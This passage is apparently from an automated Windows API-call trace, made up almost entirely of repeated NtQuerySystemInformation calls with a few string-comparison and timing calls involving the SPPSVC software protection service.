ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0273.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b8, Length=0x50, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0273.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x28, ResultLength=0x0) [0273.463] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0273.464] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0273.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc30 | out: lpSystemTimeAsFileTime=0xc751dfcc30*(dwLowDateTime=0x4463737, dwHighDateTime=0x1d5fb6f)) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc20, Length=0x28, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0273.473] GetTickCount () returned 0x1184aa3 [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation 